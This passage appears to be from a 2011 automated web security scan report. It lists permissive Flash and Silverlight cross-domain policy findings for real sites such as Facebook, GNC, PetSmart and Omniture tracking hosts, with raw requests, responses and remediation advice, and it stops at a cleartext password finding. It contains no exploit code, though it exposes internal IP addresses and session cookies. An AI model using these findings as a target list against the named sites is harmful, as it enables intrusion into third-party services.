Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.208.77
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.79. http://www.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 747078534
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.80. http://www.gnc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:16 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:16 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.81. https://www.gnc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.82. http://www.homedepot.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:36 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:26 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 10:46:15 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.83. http://www.petsmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.84. https://www.petsmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:17:47 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.85. http://www.res-x.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 217
Content-Type: text/xml
Last-Modified: Fri, 22 Jan 2010 01:35:21 GMT
Accept-Ranges: bytes
ETag: "fe71562939bca1:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.warnerbros.com"/>
</cross
...[SNIP]...

6.86. http://www.helzberg.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:53:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

6.87. https://www.helzberg.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helzberg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:32 GMT
ETag: "1fa-9159e300"
Content-Type: application/xml
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:12 GMT
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="testvip1.scene7.com" />
<allow-access-from domain="s7ondemand1.scene7.com" />
<allow-access-from domain="testvipd2.scene7.com" />
<allow-access-from domain="s7d2.scene7.com" />
<allow-access-from domain="origin-apps3.scene7.com" />
<allow-access-from domain="s7demo.scene7.com" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 01:53:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://cebwa.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://gsicace.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:12 GMT
Server: Omniture DC/2.0.0
xserver: www388
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://marketlive.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www438
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://metrics.brookstone.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:56 GMT
Server: Omniture DC/2.0.0
xserver: www321
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.7. http://metrics.ftd.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:38 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.8. http://metrics.gnc.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:44 GMT
Server: Omniture DC/2.0.0
xserver: www344
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://metrics.mcafee.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www76
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://metrics.pacsun.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www30
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.11. http://metrics.petsmart.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www637
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://mlarmani.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.13. http://o.toshibadirect.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www285
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.15. http://wasc.homedepot.ca/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://shoprunner.force.com/content/JsContentElementsGNC  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
